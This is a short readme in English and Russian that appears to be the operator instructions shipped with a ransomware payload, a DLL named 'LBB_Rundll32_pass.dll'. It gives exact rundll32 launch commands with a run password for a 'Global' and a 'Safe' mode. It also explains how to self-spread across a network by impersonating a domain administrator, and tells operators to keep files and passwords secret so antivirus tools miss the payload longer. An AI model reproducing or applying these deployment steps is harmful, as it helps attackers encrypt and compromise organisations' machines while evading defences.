Important information!

When using Safe Mode it is obligatory to write the full path to the file.
It is not recommended to use the root of the system disk to run the file, since on some versions of Windows it is forbidden to run from there.
When using self-spread and impersonation, the files should be run with at least local administrator privileges on any computer on the network with a valid domain administrator login and password for the impersonation.
Don't leak files and passwords to run, this will help bypass anti-viruses for as long as possible.

Важная информация!

При использовании Safe Mode обязательно нужно прописывать полный путь к файлу.
Не рекомендуется использовать корень системного диска для запуска файла, так как на некоторых версиях Windows запуск оттуда запрещён.
При использовании самораспрастранения и имперсонации, файлы нужно запускать как минимум с правами локального администратора на любом из компьютеров в сети с актуальными логином и паролем администратора домена для имперсонации.
Не допускайте утечки файлов и паролей для запуска, это поможет обходить антивирусы как можно дольше.

### Global Mode:
rundll32 C:\Users\Administrator\Desktop\LBB_Rundll32_pass.dll,gdll -pass 340052b9c6c9389009a7c4aecafd76c6

### Safe Mode:
rundll32 C:\Users\Administrator\Desktop\LBB_Rundll32_pass.dll,sdll -pass 340052b9c6c9389009a7c4aecafd76c6
